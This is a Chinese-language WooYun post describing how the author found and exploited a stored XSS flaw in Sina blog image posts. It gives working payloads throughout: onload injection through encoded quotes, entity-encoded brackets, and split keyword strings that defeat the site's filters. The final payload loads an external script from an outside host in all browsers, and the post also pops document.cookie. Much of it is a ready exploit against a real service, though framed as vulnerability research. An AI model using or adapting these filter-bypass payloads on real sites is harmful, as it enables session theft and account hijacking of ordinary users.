WooYun.org

下面来和大家分析分享一下我寻找这个漏洞并且利用的的整个过程。
1. 看到好多乌云的储存型XSS帖子都是从图片，视频之类的搞起的，于是我就去新浪博客首页去发了个图试
了试。
抓包的原post代码
<A id=up_img_58081338895761039 href="http://album.sina.com.cn/pic/6f81831bhc1b7f66073a7&amp;690" target=_blank><IMG src="http://s8.sinaimg.cn/bmiddle/6f81831bhc1b7f66073a7"></A><BR><BR>966
2. 于是我像测试其他网站XSS漏洞一样给IMG标签中的src地址后面加了个'"></\，用来测试地址有没有过滤
特殊字符，像这样src="xxxx'"></\"
结果不出所料，果然是给过滤掉了 " 。
3. 之后我又想既然过滤掉了"那么&quot;有没有过滤呢？
于是将post地址修改成如下形式
src="xxxx&quot;onload=&quot;alert(1)&quot;"
提交之后刷新后弹出了1，说明执行了alert(1)，当时蛮高兴的，因为说明这里是存在储存型的XSS的，没有
过滤onload和&quot;。
4. 然后的想法肯定是和大家一样了，插入外部js文件。
查看了首页的源文件后，发现script标签的第3个是src形式的，于是我在post数据中写了如下代码。
src="xxxx&quot;onload=&quot;document.getElementsByTagName('script')[2].src='http://px1624.sinaapp.com/pxrenren.js'&quot;"
结果竟然没有调用成功，图片不显示了。用F12看源码，也看不到任何和我post有关的数据。
5. 想了下，应该是新浪过滤了单引号吧，于是便把单引号全部替换为了&#39;
发现竟然还是不成功，一段时间的测试之后发现[]也被过滤了，于是我便把[]也替换成了&#x5B;和&#x5D;
便成了如下的post数据
src="xxxx&quot;onload=&quot;document.getElementsByTagName(&#39;script&#39;)&#x5B;2&#x5D;.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;&quot;"
6. 但是还是不成功。不愧是新浪啊，限制因素真多，就算找到了xss点想插入外部js文件还是困难重重。
接着我想到，会不会是document或者getElementsByTagName等关键字被过滤了？
于是我试着alert(document.cookie)了一下,发现可以弹出，那就应该是过滤了getElementsByTagName了。
但是这里我们需要用getElementsByTagName来修改script中的src，怎么办呢？
7. 我试着用String.fromCharCode()把getElementsByTagName转换成ASCII码来绕过，结果还是不行。
最后我想到用字符串拆分的办法，把getElementsByTagName拆开写去绕过限制，如下方法
document.getElementsByTagName ------> document['get'+'ElementsByTagName']
post数据如下
src="xxxx&quot;onload=&quot;document&#x5B;&#39;get&#39;+&#39;ElementsByTagName&#39;&#x5D;(&#39;script&#39;)&#x5B;2&#x5D;.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;&quot;"
结果如图

终于成功调用了外部js了。
8. 但是还没完，因为document.getElementsByTagName是IE-only的，如果用非IE浏览器的话，是不会中招的。
于是我需要写一个浏览器通杀的代码。
下面转向谷歌浏览器测试。
我想到了
var s=document.createElement("script");
s.src="JS地址";
document.body.appendChild(s);
9. 果然，新浪也过滤了createElement，appendChild等关键词，
绕过方法同上，把字符串拆开写。
代码如下
&quot;onload=&quot;var&#32;s=document&#x5B;&#39;creat&#39;+&#39;eElement&#39;&#x5D;(&#39;script&#39;);s.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;;document.body&#x5B;&#39;appe&#39;+&#39;ndChild&#39;&#x5D;(s)&quot;
结果发现
var&#32;s= 提交后这里的空格&#32;自动变成了20%了。
于是想到了和空格差不多的tab，
var&#09;s= 结果提交后这里的&#09;也自动变成了%09;
10. 我擦，看来只有出绝招了，利用window的属性去通杀吧！
把上面代码中的var s和s都替换成window.s，post的代码变为了
&quot;onload=&quot;window.s=document&#x5B;&#39;creat&#39;+&#39;eElement&#39;&#x5D;(&#39;script&#39;);window.s.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;;document.body&#x5B;&#39;appe&#39;+&#39;ndChild&#39;&#x5D;(window.s)&quot;
测试，终于ok了，所有浏览器通杀！
火狐和谷歌的效果如图

下面图是charles和网页F12中的代码截图。

上图中圈起来的部分，是post数据中自己插入的构造代码。

上图中显示成功的调用了我的外部js文件。
上次试人人网的时候直接
onlaod="document.getElementsByTagName('script')[2].src='http://px1624.sinaapp.com/pxrenren.js'"
就ok了，没想到新浪这里过滤和限制了这么多，果然安全性不是一个级别的哦。
忙活了蛮久的，终于还是成功了可以调用外部任意js了。
最后这里要感谢gainover在我突破限制的过程中对我的一些提示与帮助，谢谢大家的细心阅读，分析描述完毕！